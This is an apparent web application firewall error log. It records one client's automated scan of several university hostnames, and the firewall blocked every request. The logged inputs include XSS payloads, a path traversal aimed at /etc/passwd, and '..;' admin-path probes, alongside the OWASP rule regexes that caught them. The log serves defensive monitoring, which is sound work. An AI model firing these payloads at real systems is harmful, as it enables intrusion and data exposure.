[Tue Aug 29 11:52:27.653800 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAfWON0AAAAL"]
[Tue Aug 29 11:52:27.657017 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAoQ3IQAAAAN"]
[Tue Aug 29 11:52:27.675833 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAoN9cgAAAAJ"]
[Tue Aug 29 11:52:27.680268 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15i8Co-f0AAAoO5zEAAAAK"]
[Tue Aug 29 11:52:27.691395 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15i8Co-f0AAAmNp7EAAAAQ"]
[Tue Aug 29 11:52:27.695889 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15i8Co-f0AAAlIBmoAAAAn"]
[Tue Aug 29 11:52:27.812217 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAoPuTwAAAAM"]
[Tue Aug 29 11:52:27.816341 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15i8Co-f0AAAoEZO0AAAAB"]
[Tue Aug 29 11:52:27.840196 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAoO5zIAAAAK"]
[Tue Aug 29 11:52:27.875434 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15i8Co-f0AAAoN9ckAAAAJ"]
[Tue Aug 29 11:52:27.955179 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15i8Co-f0AAAoEZO4AAAAB"]
[Tue Aug 29 11:52:28.540320 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15jMCo-f0AAAoPuT0AAAAM"]
[Tue Aug 29 11:52:28.555415 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15jMCo-f0AAAoN9coAAAAJ"]
[Tue Aug 29 11:52:28.557259 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15jMCo-f0AAAnjjOwAAAAX"]
[Tue Aug 29 11:52:28.561007 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15jMCo-f0AAAnd3GoAAAAI"]
[Tue Aug 29 11:52:28.562468 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15jMCo-f0AAAfWON4AAAAL"]
[Tue Aug 29 11:52:28.682668 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAoEZO8AAAAB"]
[Tue Aug 29 11:52:28.683341 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAoN9csAAAAJ"]
[Tue Aug 29 11:52:28.684394 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAoO5zUAAAAK"]
[Tue Aug 29 11:52:28.687862 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15jMCo-f0AAAoGFXkAAAAE"]
[Tue Aug 29 11:52:28.689751 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAnn2DcAAAAe"]
[Tue Aug 29 11:52:28.701623 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15jMCo-f0AAAnd3GsAAAAI"]
[Tue Aug 29 11:52:28.722788 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAoEZPAAAAAB"]
[Tue Aug 29 11:52:29.557698 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: 